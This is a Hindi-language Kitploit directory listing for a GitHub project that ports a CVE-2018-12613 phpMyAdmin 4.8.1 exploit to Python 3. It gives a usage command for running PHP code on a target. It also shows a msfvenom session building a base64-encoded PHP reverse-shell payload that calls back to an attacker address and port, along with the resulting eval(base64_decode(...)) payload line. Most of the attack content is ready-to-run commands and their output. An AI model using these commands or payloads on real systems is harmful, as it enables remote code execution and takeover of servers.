Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-12613 — Python 3 के लिए पोर्ट किया गया संशोधित स्टैंडअलोन एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/ivanitlearning/cve-2018-12613
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubivanitlearning/cve-2018-12613

CVE-2018-12613

Python 3 के लिए पोर्ट किया गया संशोधित स्टैंडअलोन एक्सप्लॉइट

रिपॉजिटरी देखें
46 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-12613

संशोधित स्टैंडअलोन एक्सप्लॉइट जिसे Python 3 में पोर्ट किया गया है। Python 3.7.3, Ubuntu 16.04 पर चल रहे phpMyAdmin 4.8.1 पर परीक्षण किया गया। केवल Linux पर काम करता है। मूल एक्सप्लॉइट SSD द्वारा। सभी श्रेय उन्हें।

किए गए परिवर्तन

  1. यदि दिया गया phpMyAdmin उपयोगकर्ता नाम/पासवर्ड सही है तो बाहर निकलने के लिए फ़ंक्शन जोड़ा गया
  2. यह जाँचने के लिए फ़ंक्शन जोड़ा गया कि संस्करण असुरक्षित है या नहीं (4.8.0 या 4.8.1)
  3. चरों को सख्ती से bytes या strings में परिवर्तित किया गया; Python 3 में मिश्रण की अनुमति नहीं है। यह देखें।

उपयोग:

python3 CVE-2018-12613.py -u phpMyAdmin -p password -U http:///[url-phpMyAdmin] –P ”phpcredits();”

php कोड के परिणाम results.html में संग्रहीत होते हैं

रिवर्स शेल के लिए

root@kitploit:~
root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# msfvenom --platform php -a php -e php/base64 -p php/reverse_php LHOST=192.168.92.134 LPORT=4444 -o payload.php
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4045 (iteration=0)
php/base64 chosen with final size 4045
Payload size: 4045 bytes
Saved as: payload.php

ऊपर दिए गए phpcredits(); के स्थान पर msfvenom php पेलोड का उपयोग करें

root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# cat payload.php

eval(base64_decode(ICAg...gfQo));

टूल डाउनलोड करें